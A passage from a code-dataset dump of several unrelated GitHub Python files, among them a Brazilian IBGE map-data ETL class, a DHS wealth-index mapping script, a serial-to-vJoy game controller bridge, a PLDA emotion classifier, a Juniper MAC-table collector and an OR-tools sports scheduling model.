main(args)\n","repo_name":"soft-top-notch/DataCleaner","sub_path":"dbtool.py","file_name":"dbtool.py","file_ext":"py","file_size_in_byte":8831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20655435994","text":"import abc\nimport os\nimport typing\nfrom pathlib import Path\n\nimport geopandas as gpd\n\nfrom ._base import _BaseFTPIBGE\nfrom ._base import extrai_link\n\n\nclass _BaseMalhaIBGE(_BaseFTPIBGE, abc.ABC):\n    \"\"\"\n    Class structured to download and process the data of an IBGE\n    geographic mesh (malha)\n    \"\"\"\n\n    URL_BASE: typing.Dict[str, str] = {\n        \"mun\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n        \"uf\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n        \"meso\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n        \"micro\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n        \"brasil\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n    }\n\n    
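# Illustrative sketch (2021 is an assumed year, for illustration only): for\n    # granularidade=\"uf\" the constructor below composes\n    #   url  = URL_BASE[\"uf\"] + \"/\" + GRANULARIDADE[\"uf\"].format(ano=2021)\n    #        = \".../malhas_municipais/municipio_2021/Brasil/BR\"\n    #   base = BASE[\"uf\"].format(ano=2021) = \"BR_UF_2021.zip\"\n    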
GRANULARIDADE: typing.Dict[str, str] = {\n \"mun\": \"municipio_{ano}/Brasil/BR\",\n \"uf\": \"municipio_{ano}/Brasil/BR\",\n \"meso\": \"municipio_{ano}/Brasil/BR\",\n \"micro\": \"municipio_{ano}/Brasil/BR\",\n \"brasil\": \"municipio_{ano}/Brasil/BR\",\n }\n\n BASE: typing.Dict[str, str] = {\n \"mun\": \"BR_Municipios_{ano}.zip\",\n \"uf\": \"BR_UF_{ano}.zip\",\n \"meso\": \"BR_Mesorregioes_{ano}.zip\",\n \"micro\": \"BR_Microrregioes_{ano}.zip\",\n \"brasil\": \"BR_Pais_{ano}.zip\",\n }\n\n _ano: typing.Union[int, str]\n _granularidade: str\n\n def __init__(\n self,\n entrada: typing.Union[str, Path],\n saida: typing.Union[str, Path],\n granularidade: str,\n ano: typing.Union[int, str] = \"ultimo\",\n criar_caminho: bool = True,\n reprocessar: bool = False,\n ) -> None:\n \"\"\"\n Instância o objeto de ETL INEP\n\n :param entrada: string com caminho para pasta de entrada\n :param saida: string com caminho para pasta de saída\n :param granularidade: nível geográfico a ser processado\n :param ano: ano da pesquisa a ser processado (pode ser um inteiro ou 'ultimo')\n :param criar_caminho: flag indicando se devemos criar os caminhos\n :param reprocessar: flag para forçar o re-processamento das bases de dados\n \"\"\"\n assert granularidade in self.GRANULARIDADE\n self._ano = ano\n self._granularidade = granularidade\n url = (\n self.URL_BASE[granularidade]\n + \"/\"\n + self.GRANULARIDADE[granularidade].format(ano=self.ano)\n )\n super().__init__(\n entrada=entrada,\n saida=saida,\n sub_pasta=\"malha\",\n url=url,\n geo=True,\n base=self.BASE[granularidade].format(ano=self.ano),\n criar_caminho=criar_caminho,\n reprocessar=reprocessar,\n )\n\n def tem_dados_saida(self) -> bool:\n \"\"\"\n Verifica se o objeto ETL possuí todos os dados que fazem\n parte da sua saída\n\n :return: True se os dados estiver disponíveis\n \"\"\"\n saidas = set(os.listdir(self.caminho_saida))\n if saidas.issuperset(set(self.bases_saida)):\n for b in self.bases_saida:\n sub = os.listdir(self.caminho_saida / b)\n if f\"ANO={self.ano}\" not in sub:\n return False\n elif f\"{self.ano}.parquet\" not in os.listdir(\n self.caminho_saida / f\"{b}/ANO={self.ano}\"\n ):\n return False\n return True\n else:\n return False\n\n def carrega_saidas(self) -> None:\n \"\"\"\n Carrega os dados de saída no dicionário de dados de saída\n caso as mesmas existam\n \"\"\"\n if self.tem_dados_saida():\n self._dados_saida = {\n arq: gpd.read_parquet(\n self.caminho_saida / f\"{arq}/ANO={self.ano}\"\n ).assign(ANO=self.ano)\n for arq in self.bases_saida\n }\n\n @property\n def ano(self) -> int:\n \"\"\"\n Ano da base sendo processado pelo objeto\n\n :return: ano como um número inteiro\n \"\"\"\n if isinstance(self._ano, str):\n if self._ano == \"ultimo\":\n anos = [\n int(a.replace(\"municipio_\", \"\").replace(\"/\", \"\"))\n for a in extrai_link(\n self.URL_GEO + \"/\" + self.URL_BASE[self._granularidade]\n )\n ]\n self._ano = sorted(anos)[-1]\n else:\n if self._ano.isnumeric():\n self._ano = int(self._ano)\n else:\n raise ValueError(f\"Não conseguimos processar ano={self._ano}\")\n return self._ano\n\n def _load(self) -> None:\n \"\"\"\n Exporta os dados transformados\n \"\"\"\n for arq, df in self.dados_saida.items():\n (self.caminho_saida / f\"{arq}/ANO={self.ano}\").mkdir(\n parents=True, exist_ok=True\n )\n\n df.drop(columns=\"ANO\").to_parquet(\n self.caminho_saida / f\"{arq}/ANO={self.ano}/{self.ano}.parquet\",\n index=False,\n 
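# Hive-style partitioned layout: <saida>/<arq>/ANO=<ano>/<ano>.parquet,\n            # the same path tem_dados_saida() checks before reprocessing\n            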
)\n","repo_name":"Ignorancia-Zero/curso-ciencia-dados-treino","sub_path":"src/aquisicao/ibge/_malha.py","file_name":"_malha.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"pt","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"7344896267","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 14:47:41 2022\n\n@author: janinedevera\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport geopandas as gpd\nimport fiona\nimport os, glob\n\n\n## DIRECTORIES\n\nmain = '/Users/janinedevera/Documents/School/MDS 2021-2023/Semester 2/3 Machine Learning/Project/Poverty/'\nrepo = main + 'ML-SS22/'\nmaps = main + 'Data/Maps/'\ngdrive = '/Volumes/GoogleDrive/Shared drives/ML Project_Satellite Images and Poverty/'\ndhs_vars = 'Outcome/Wealth Index/'\ndhs_geo = 'Outcome/Geo Data/'\nfinal_out = 'Outcome/Final Outcome/'\n\n## OUTCOME VARIABLES\n\n # wealth index\nos.chdir(gdrive + dhs_vars)\n\nextension = 'DTA'\nwealth_filenames = [i for i in glob.glob('*.{}'.format(extension))]\n\nwealth_all = pd.concat([pd.read_stata(f) for f in wealth_filenames])\nwealth = wealth_all[[\"hv000\", \"hv001\", \"hv007\", \"hv270\", \"hv271\", \"hv270a\", \"hv271a\"]]\nwealth['hv000'] = wealth['hv000'].str.replace('7', '')\nwealth['mergeid'] = wealth['hv000'] + '-' + wealth['hv001'].map(str)\n\n # geotags\nos.chdir(gdrive + dhs_geo)\n\nextension = 'shp'\ngeo_filenames = [i for i in glob.glob('*.{}'.format(extension))]\n\ngeo_all = pd.concat([gpd.read_file(f) for f in geo_filenames])\ngeo_all['mergeid'] = geo_all['DHSCC'] + '-' + geo_all['DHSCLUST'].astype(int).astype(str)\n\n # merge wealth data with geodata\noutcome_gdf = geo_all.merge(wealth, left_on = 'mergeid', right_on='mergeid')\n\n # create geoid\noutcome_gdf = outcome_gdf[[\"DHSID\", \"hv000\", \"LATNUM\", \"LONGNUM\", \"geometry\", \"hv270a\", \"hv271\"]]\noutcome_gdf['hv271'] = (outcome_gdf['hv271'] / 100000)\noutcome_gdf.rename(columns = {'hv000':'country', 'hv270a':'category', 'hv271':'wealth'}, inplace = True)\noutcome_gdf['category'] = outcome_gdf['category'].astype(str)\n\n # save\nos.chdir(repo)\noutcome_gdf.to_file(\"outcome_gdf.shp\")\n\n # ethiopia\neth_gdf = outcome_gdf[outcome_gdf['country'] == 'ET']\neth_gdf.to_file(\"eth_gdf.shp\")\n\n # malawi\nmlw_gdf = outcome_gdf[outcome_gdf['country'] == 'MW']\nmlw_gdf.to_file(\"mlw_gdf.shp\")\n\n # mali\nmli_gdf = outcome_gdf[outcome_gdf['country'] == 'ML']\nmli_gdf.to_file(\"mli_gdf.shp\")\n\n # nigeria\nngr_gdf = outcome_gdf[outcome_gdf['country'] == 'NG']\nngr_gdf.to_file(\"ngr_gdf.shp\")\n\n\n\n####### MAPS\n\n # read final outcome geodf \neth_gdf = gpd.read_file(gdrive + final_out + 'eth_gdf.shp')\nmlw_gdf = gpd.read_file(gdrive + final_out + 'mlw_gdf.shp')\nmli_gdf = gpd.read_file(gdrive + final_out + 'mli_gdf.shp')\nngr_gdf = gpd.read_file(gdrive + final_out + 'ngr_gdf.shp')\n\n # read country map\nmlw_map = gpd.read_file(maps + 'Malawi/mwi_admbnda_adm3_nso_20181016.shp')\neth_map = gpd.read_file(maps + 'Ethiopia/eth_admbnda_adm2_csa_bofedb_2021.shp')\nmli_map = gpd.read_file(maps + 'Mali/mli_admbnda_adm3_1m_gov_20211220.shp')\nngr_map = gpd.read_file(maps + 'Nigeria/NER_adm02_feb2018.shp')\n\n\n # gdf set up \ndef genid (geodf):\n geodf['geoid'] = (~geodf.geometry.duplicated()).cumsum()\n return geodf\n\n # map function \ndef genmaps (geodf, shp):\n coord = geodf[[\"geoid\", \"geometry\"]]\n clus = geodf.groupby([\"geoid\"]).mean().reset_index()\n clus = 
pd.merge(coord, clus).drop_duplicates()\n join = gpd.sjoin(clus, shp, how = 'right', predicate = 'within')\n join = join[join['wealth'].notna()]\n img = join.plot(alpha=0.7, column = \"wealth\", cmap = \"RdYlGn\", legend=True, figsize=(6,8),\n legend_kwds={'label': \"Wealth Index\"})\n img.set_axis_off();\n return img\n\n\n ## malawi\nmlw_gdf = genid(mlw_gdf)\nmlw_img = genmaps(mlw_gdf, mlw_map)\n\n ## ethiopia\neth_gdf = genid(eth_gdf)\neth_img = genmaps(eth_gdf, eth_map)\n\n ## mali\nmli_gdf = genid(mli_gdf)\nmli_img = genmaps(mli_gdf, mli_map)\n\n ## nigeria\nngr_gdf = genid(ngr_gdf)\nngr_img = genmaps(ngr_gdf, ngr_map)\n\n\n\n\n\n \n \n \n \n\n","repo_name":"ccepelak/ML-SS22","sub_path":"wealth_index_all.py","file_name":"wealth_index_all.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23494297818","text":"#!/usr/bin/env python2\n\nimport csv\nimport glob\nimport os.path\nimport string\nimport sys\n\nimport mincemeat as mm\n\n\ndef readall(fname):\n with open(fname, 'r') as f:\n return f.read()\n\n\ndef run_server(docs, docnames):\n rdr = {docname: readall(fname).translate(None, string.punctuation) for fname, docname in zip(docs, docnames)}\n\n s = mm.Server()\n s.datasource = rdr\n s.mapfn = mapfn\n s.reducefn = eval(reducefn_template % docnames)\n\n return s.run_server()\n\n\ndef mapfn(k, v):\n import nltk.tokenize as tkz\n\n for w in tkz.wordpunct_tokenize(v):\n yield w.lower(), k\n\n\nreducefn_template = 'lambda k, vs: map(vs.count, %s)'\n\n\nif __name__ == '__main__':\n docs = glob.glob(os.path.join(sys.argv[1], '*'))\n docnames = [os.path.splitext(os.path.basename(x))[0] for x in docs]\n\n out = run_server(docs, docnames)\n\n with open(sys.argv[2], 'w') as outf:\n wr = csv.writer(outf)\n wr.writerow(['Term'] + docnames)\n wr.writerows([[k] + v for k, v in out.iteritems()])\n","repo_name":"dsavelyev/vpirod-mapreduce","sub_path":"sherlock.py","file_name":"sherlock.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34035458252","text":"import serial\nimport argparse\nimport time\nimport logging\nimport pyvjoy # Windows apenas\n\nclass MyControllerMap:\n def __init__(self):\n self.button = {'UP': 1, 'DOWN': 2, 'LEFT': 3, 'RIGHT': 4, 'RED': 5, 'YELLOW' : 6, 'GREEN': 7, 'BLUE': 8}\n\n\nclass SerialControllerInterface:\n\n # Protocolo\n # byte 1 -> id do botão\n # byte 2 -> status do botão\n # byte 3 -> byte mais significativo do valor do analógico\n # byte 5 -> byte menos significativo do valor do analógico\n # byte 5 -> EOP - End of Packet -> valor reservado 'X'\n\n def __init__(self, port, baudrate):\n self.ser = serial.Serial(port, baudrate=baudrate)\n self.mapping = MyControllerMap()\n self.j = pyvjoy.VJoyDevice(1)\n self.incoming = '0'\n\n def update(self):\n ## Sync protocol\n while self.incoming != b'X':\n self.incoming = self.ser.read()\n logging.debug(\"Received INCOMING: {}\".format(self.incoming))\n\n id = self.ser.read()\n button = self.ser.read()\n value1 = self.ser.read()\n value2 = self.ser.read()\n\n logging.debug(\"Received DATA: {}, button {}, value1 {}\".format(id, button, value1))\n\n # Protocolo do Handshake\n if button == b'W':\n self.ser.write(b'w')\n logging.info(\"Mandando w de volta pro microship\") \n\n if button == b'1':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['UP'], 1)\n\n if button == b'A':\n 
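# Release codes mirror the press codes: digits '1'..'8' press UP..BLUE,\n            # letters 'A'..'H' release the matching button (here 'A' releases UP)\n            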
self.j.set_button(self.mapping.button['UP'], 0)\n\n        if button == b'2':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['DOWN'], 1)\n        if button == b'B':\n            self.j.set_button(self.mapping.button['DOWN'], 0) \n\n        if button == b'3':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['LEFT'], 1)\n        if button == b'C':\n            self.j.set_button(self.mapping.button['LEFT'], 0) \n\n        if button == b'4':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['RIGHT'], 1)\n        if button == b'D':\n            self.j.set_button(self.mapping.button['RIGHT'], 0) \n\n        if button == b'5':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['RED'], 1)\n        if button == b'E':\n            self.j.set_button(self.mapping.button['RED'], 0) \n\n        if button == b'6':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['YELLOW'], 1)\n        if button == b'F':\n            self.j.set_button(self.mapping.button['YELLOW'], 0) \n\n        if button == b'7':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['GREEN'], 1)\n        if button == b'G':\n            self.j.set_button(self.mapping.button['GREEN'], 0) \n\n        if button == b'8':\n            logging.info(\"Sending press\")\n            self.j.set_button(self.mapping.button['BLUE'], 1)\n        if button == b'H':\n            self.j.set_button(self.mapping.button['BLUE'], 0) \n\n        # Left analog stick: readings between 2000 and 3400 of the 0-4095 ADC range\n        # are treated as the dead zone and recentre the virtual axis\n        if button == b'Y':\n            if id == b'I':\n                conv_valor1 = int.from_bytes(value2 + value1, byteorder=\"big\")\n                if (conv_valor1 > 3400 or conv_valor1 < 2000):\n                    self.j.set_axis(pyvjoy.HID_USAGE_X, conv_valor1*int(32762/4095))\n                else:\n                    self.j.set_axis(pyvjoy.HID_USAGE_X, int(32762/2))\n\n            if id == b'J':\n                conv_valor2 = int.from_bytes(value2 + value1, byteorder=\"big\")\n                if (conv_valor2 > 3400 or conv_valor2 < 2000):\n                    self.j.set_axis(pyvjoy.HID_USAGE_Y, conv_valor2*int(32762/4095))\n                else:\n                    self.j.set_axis(pyvjoy.HID_USAGE_Y, int(32762/2))\n\n        # Right analog stick (RX/RY, mirrored onto the RZ axis)\n        if button == b'Z':\n            if id == b'K':\n                conv_valor3 = int.from_bytes(value2 + value1, byteorder=\"big\")\n                if (conv_valor3 > 3400 or conv_valor3 < 2000):\n                    self.j.set_axis(pyvjoy.HID_USAGE_RX, conv_valor3*int(32762/4095))\n                    self.j.set_axis(pyvjoy.HID_USAGE_RZ, 32762 - conv_valor3*int(32762/4095))\n                else:\n                    self.j.set_axis(pyvjoy.HID_USAGE_RX, int(32762/2))\n                    self.j.set_axis(pyvjoy.HID_USAGE_RZ, int(32762/2))\n            \n            if id == b'L':\n                conv_valor4 = int.from_bytes(value2 + value1, byteorder=\"big\")\n                if (conv_valor4 > 3400 or conv_valor4 < 2000):\n                    self.j.set_axis(pyvjoy.HID_USAGE_RY, conv_valor4*int(32762/4095))\n                    self.j.set_axis(pyvjoy.HID_USAGE_RZ, 32762 - conv_valor4*int(32762/4095))\n                else:\n                    self.j.set_axis(pyvjoy.HID_USAGE_RY, int(32762/2))\n                    self.j.set_axis(pyvjoy.HID_USAGE_RZ, int(32762/2))\n\n        self.incoming = self.ser.read()\n\n\nclass DummyControllerInterface:\n    def __init__(self):\n        self.mapping = MyControllerMap()\n        self.j = pyvjoy.VJoyDevice(1)\n\n    def update(self):\n        # The mapping has no 'A' entry, so pulse 'UP' instead to avoid a KeyError\n        self.j.set_button(self.mapping.button['UP'], 1)\n        time.sleep(0.1)\n        self.j.set_button(self.mapping.button['UP'], 0)\n        logging.info(\"[Dummy] Pressed UP button\")\n        time.sleep(1)\n\n\nif __name__ == '__main__':\n    interfaces = ['dummy', 'serial']\n    # Name the parser distinctly so it does not shadow the argparse module\n    parser = argparse.ArgumentParser()\n    parser.add_argument('serial_port', type=str)\n    parser.add_argument('-b', '--baudrate', type=int, default=9600)\n    parser.add_argument('-c', '--controller_interface', type=str, default='serial', choices=interfaces)\n    parser.add_argument('-d', '--debug', default=False, action='store_true')\n    args = parser.parse_args()\n    if args.debug:\n        
logging.basicConfig(level=logging.DEBUG)\n\n print(\"Connection to {} using {} interface ({})\".format(args.serial_port, args.controller_interface, args.baudrate))\n if args.controller_interface == 'dummy':\n controller = DummyControllerInterface()\n else:\n controller = SerialControllerInterface(port=args.serial_port, baudrate=args.baudrate)\n\n while True:\n controller.update()\n","repo_name":"LidiaDomingos/Control-Impact","sub_path":"python/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27381393455","text":"import sys\nimport ast\nimport numpy as np\nimport csv\nimport random\nfrom sklearn.utils import shuffle\nimport math\nimport sys\n\ndef delta(emotion_vecs, v, covar, input_vec, N):\n output = np.linalg.slogdet(np.add(covar, N*np.matmul(v, v.T)))\n return output[0]*output[1]\n\ndef newsum(emotion_vecs, has_input, input_vec):\n current_sum = emotion_vecs[0]\n for vec in emotion_vecs[1:]:\n current_sum = np.add(current_sum, vec)\n if has_input:\n current_sum = np.add(current_sum, input_vec)\n return current_sum\n\ndef calculatek(emotion_vecs, v, covar, input_vec, N):\n return np.matmul(np.matmul(np.matmul((np.linalg.inv(np.add(covar, N*np.matmul(v, v.T)))), v), v.T), np.linalg.inv(covar))\n\ndef log_likelihood(emotion_vecs, mean, v, covar, input_vec):\n # subtract m from all vectors\n new_emotion_vecs = []\n for vec in emotion_vecs:\n new_emotion_vecs.append(np.subtract(vec, mean))\n new_emotion_vecs = np.array(new_emotion_vecs)\n input_vec = np.subtract(input_vec, mean)\n \n first_term = delta(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs) + 1)\n second_term = np.matmul(np.matmul(newsum(new_emotion_vecs, True, input_vec).T, calculatek(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs) + 1)), newsum(new_emotion_vecs, True, input_vec))\n third_term = delta(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs))\n fourth_term = np.matmul(np.matmul(newsum(new_emotion_vecs, False, input_vec).T, calculatek(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs))), newsum(new_emotion_vecs, False, input_vec))\n fifth_term = delta(new_emotion_vecs, v, covar, input_vec, 1)\n sixth_term = 1/2*np.matmul(np.matmul(input_vec.T, calculatek(new_emotion_vecs, v, covar, input_vec, 1)), input_vec)\n\n ratio = -1*first_term - second_term + third_term + fourth_term + fifth_term + sixth_term\n\n return ratio\n\n\nmeld = open(\"meld_xvectors.csv\")\nreader = csv.reader(meld, delimiter=',')\n\ntrain = []\ntrain_labels = []\ntest = []\ntest_labels = []\nad = 0\nh = 0\ns = 0\nn = 0\nfs = 0\nad_val = []\nh_val = []\ns_val = []\nn_val = []\nfs_val = []\n\nline = 0\nfor row in reader:\n if line == 0:\n line += 1\n else:\n random_number = random.random()\n if random_number < 0.8 and len(train) < 10966:\n train.append(ast.literal_eval(row[4]))\n if row[2] == \"anger/disgust\":\n train_labels.append(0)\n ad += 1\n ad_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"happiness\":\n train_labels.append(1)\n h += 1\n h_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"sadness\":\n train_labels.append(2)\n s += 1\n s_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"neutral\":\n train_labels.append(3)\n n += 1\n n_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"fear/surprise\":\n train_labels.append(4)\n fs += 1\n fs_val.append(ast.literal_eval(row[4]))\n else:\n test.append(ast.literal_eval(row[4]))\n if 
row[2] == \"anger/disgust\":\n test_labels.append(0)\n elif row[2] == \"happiness\":\n test_labels.append(1)\n elif row[2] == \"sadness\":\n test_labels.append(2)\n elif row[2] == \"neutral\":\n test_labels.append(3)\n elif row[2] == \"fear/surprise\":\n test_labels.append(4)\n line += 1\n\ntrain = np.array(train)\ntrain_labels = np.array(train_labels)\ntest = np.array(test)\ntest_labels = np.array(test_labels)\n\nx = shuffle(train, train_labels)\nnew_train = x[0]\nnew_train_labels = x[1]\ny = shuffle(test, test_labels)\nnew_test = y[0]\nnew_test_labels = y[1]\n\nnew_file_lda = open(\"output_lda\")\n# parameters of LDA\nmatrix = []\nfor row in new_file_lda:\n count = 0\n for x in row.split(\" \"):\n if x != '\\n' and x and x != ']\\n' and x != '[\\n':\n if count < 512:\n matrix.append(float(x))\n count += 1\nmatrix = np.array(matrix)\nmatrix = np.reshape(matrix, (512, 200))\n\n# put the train and test sets through LDA\nad_val = np.array(ad_val)\nh_val = np.array(h_val)\ns_val = np.array(s_val)\nn_val = np.array(n_val)\nfs_val = np.array(fs_val)\nad_val = np.matmul(ad_val, matrix)\nh_val = np.matmul(h_val, matrix)\ns_val = np.matmul(s_val, matrix)\nn_val = np.matmul(n_val, matrix)\nfs_val = np.matmul(fs_val, matrix)\nnew_test = np.matmul(new_test, matrix)\n\nnew_file = open(\"output_plda\")\n\n# parameters of PLDA\nmean = None\nV = []\ncovar = None\n\ncount = 0\nlist_string = ''\nfor row in new_file:\n if count == 0:\n mean = list(map(float, (row[7:].split(\" \")[2:-1])))\n elif count < 202:\n list_string += row\n elif count == 202:\n for x in list_string.split(\" \"):\n if x != '\\n' and x and x != ']\\n' and x != '[\\n':\n V.append(float(x))\n covar = list(map(float, (row.split(\" \")[2:-1])))\n count += 1\n\nmean = np.array(mean, dtype=np.float64)\nV = np.array(V, dtype=np.float64)\nV = np.reshape(V, (200, 200))\ncovar = np.diag(covar)\n\ncorrect = 0\ntotal = 0\n# loop through tests\nfor i in range(len(new_test)):\n # actual label\n actual = new_test_labels[i]\n scores = []\n # do a multisession scoring for each class\n # http://faculty.iitmandi.ac.in/~padman/papers/padman_ivecAvgPLDA_DSP_2014.pdf\n for j in range(5):\n if j == 0:\n scores.append(log_likelihood(ad_val, mean, V, covar, new_test[i]))\n elif j == 1:\n scores.append(log_likelihood(h_val, mean, V, covar, new_test[i]))\n elif j == 2:\n scores.append(log_likelihood(s_val, mean, V, covar, new_test[i]))\n elif j == 3:\n scores.append(log_likelihood(n_val, mean, V, covar, new_test[i]))\n elif j == 4:\n scores.append(log_likelihood(fs_val, mean, V, covar, new_test[i]))\n if actual == scores.index(max(scores)):\n correct += 1\n total += 1\n\nprint(correct/total)","repo_name":"jessicah25/emotion-detection","sub_path":"scoring_plda.py","file_name":"scoring_plda.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"358533088","text":"\"\"\"\r\nMAC address table information for Juniper devices\r\n\r\nNOTE: This only returns dummy data at the moment\r\n\r\nModules:\r\n 3rd Party: traceback\r\n Internal: netconf\r\n\r\nClasses:\r\n\r\n Mac\r\n Collect MAC address table information from Juniper devices\r\n\r\nFunctions\r\n\r\n mac_table\r\n Collect MAC address table information from Juniper devices\r\n\r\nExceptions:\r\n\r\n None\r\n\r\nMisc Variables:\r\n\r\n TBA\r\n\r\nAuthor:\r\n Luke Robertson - May 2023\r\n\"\"\"\r\n\r\n\r\nimport traceback as tb\r\n\r\nimport netconf\r\n\r\n\r\nclass Mac:\r\n \"\"\"\r\n Connect to a Junos device and 
collect information\r\n\r\n Supports being instantiated with the 'with' statement\r\n\r\n Attributes\r\n ----------\r\n host : str\r\n IP address or FQDN of the device to connect to\r\n user : str\r\n Username to connect with\r\n password : str\r\n Password to connect with\r\n\r\n Methods\r\n -------\r\n __init__(host, user, password)\r\n Class constructor\r\n __enter__()\r\n Called when the 'with' statement is used\r\n __exit__(exc_type, exc_value, traceback)\r\n Called when the 'with' statement is finished\r\n mac()\r\n Collect MAC address table information from Juniper devices\r\n \"\"\"\r\n\r\n def __init__(self, host, user, password):\r\n \"\"\"\r\n Class constructor\r\n\r\n Parameters\r\n ----------\r\n host : str\r\n IP address or FQDN of the device to connect to\r\n user : str\r\n Username to connect with\r\n password : str\r\n Password to connect with\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n\r\n # Authentication information\r\n self.host = host\r\n self.user = user\r\n self.password = password\r\n\r\n # Device information\r\n self.mac_table = None\r\n\r\n def __enter__(self):\r\n \"\"\"\r\n Called when the 'with' statement is used\r\n\r\n Parameters\r\n ----------\r\n None\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n self\r\n The instantiated object\r\n \"\"\"\r\n\r\n # Connect to device, collect facts, license, and config\r\n with netconf.Netconf(\r\n host=self.host,\r\n user=self.user,\r\n password=self.password\r\n ) as connection:\r\n # If there was a failure to connect, return\r\n if connection.dev is None:\r\n return\r\n\r\n # Collect MAC address table information\r\n self.mac_table = connection.rpc_commands(\r\n 'get-ethernet-switching-table-information'\r\n )\r\n\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_value, traceback):\r\n \"\"\"\r\n Called when the 'with' statement is finished\r\n\r\n Parameters\r\n ----------\r\n None\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n self\r\n None\r\n \"\"\"\r\n\r\n # handle errors that were raised\r\n if exc_type:\r\n print(\r\n f\"Exception of type {exc_type.__name__} occurred: {exc_value}\"\r\n )\r\n if traceback:\r\n print(\"Traceback:\")\r\n print(tb.format_tb(traceback))\r\n\r\n def mac(self):\r\n \"\"\"\r\n Collect MAC address table information from Juniper devices\r\n\r\n Parameters\r\n ----------\r\n None\r\n\r\n Raises\r\n ------\r\n None\r\n\r\n Returns\r\n -------\r\n my_dict : dict\r\n Dictionary containing information\r\n \"\"\"\r\n\r\n my_dict = {\r\n \"entry\": []\r\n }\r\n\r\n # Handle newer and older versions of Junos\r\n # Newer versions have a different structure\r\n if 'l2ng-l2ald-rtb-macdb' in self.mac_table:\r\n\r\n # Get the MAC address table, if one exists\r\n # Routers don't have MAC address table entries, only ARP\r\n if self.mac_table['l2ng-l2ald-rtb-macdb'] is not None:\r\n mac_table = (\r\n self.mac_table\r\n ['l2ng-l2ald-rtb-macdb']\r\n ['l2ng-l2ald-mac-entry-vlan']\r\n ['l2ng-mac-entry']\r\n )\r\n\r\n # Loop through the MAC address table and add to the dictionary\r\n for address in mac_table:\r\n entry = {}\r\n entry['mac'] = address['l2ng-l2-mac-address']\r\n entry['vlan'] = address['l2ng-l2-mac-vlan-name']\r\n entry['interface'] = (\r\n address['l2ng-l2-mac-logical-interface']\r\n )\r\n my_dict['entry'].append(entry)\r\n\r\n # Older versions have a different structure\r\n elif 'ethernet-switching-table-information' in self.mac_table:\r\n mac_table = (\r\n self.mac_table\r\n 
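# Assumed reply shape for the older structure (sketch, for illustration only):\r\n                # {'ethernet-switching-table-information': {'ethernet-switching-table': {'mac-table-entry': [...]}}}\r\n                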
['ethernet-switching-table-information']\r\n ['ethernet-switching-table']\r\n ['mac-table-entry']\r\n )\r\n\r\n # Loop through the MAC address table and add to the dictionary\r\n for address in mac_table:\r\n entry = {}\r\n entry['mac'] = address['mac-address']\r\n entry['vlan'] = address['mac-vlan']\r\n entry['interface'] = (\r\n address['mac-interfaces-list']['mac-interfaces']\r\n )\r\n my_dict['entry'].append(entry)\r\n\r\n return my_dict\r\n\r\n\r\n# Handle running as a script\r\nif __name__ == '__main__':\r\n print('This module is not designed to be run as a script')\r\n print('Please run junos.py instead')\r\n","repo_name":"Timbertighe/NetAPI-Junos","sub_path":"mac.py","file_name":"mac.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22361748548","text":"from ortools.linear_solver import pywraplp\nimport pandas as pd\n\n\nclass SportsLeagueOpti:\n def __init__(self, n, k):\n self.n = n\n self.teams = [i + 1 for i in range(n)]\n self.k = k\n self.solver = pywraplp.Solver.CreateSolver('SAT')\n self.x, self.y, self.z, self.w, self.p = {}, {}, {}, {}, {}\n self.M = 1e5\n\n def define_variables(self):\n # Define x, y, z\n for i in self.teams:\n for j in self.teams:\n if i == j:\n continue\n self.x[i, j] = self.solver.IntVar(0, 1, f'x_{i}_{j}')\n self.y[i, j] = self.solver.IntVar(0, 1, f'y_{i}_{j}')\n self.z[i, j] = self.solver.IntVar(0, 1, f'z_{i}_{j}')\n\n # Define w\n for j in self.teams:\n if j == 1:\n continue\n self.w[j] = self.solver.IntVar(0, 1, f'w_{j}')\n\n # Define p\n for i in self.teams:\n self.p[i] = self.solver.IntVar(0, 3 * 2 * (self.n - 1), 'p')\n\n def define_constraints(self):\n # Constrain x, y, z\n for i in self.teams:\n for j in self.teams:\n if i == j:\n continue\n self.solver.Add(self.x[i, j] + 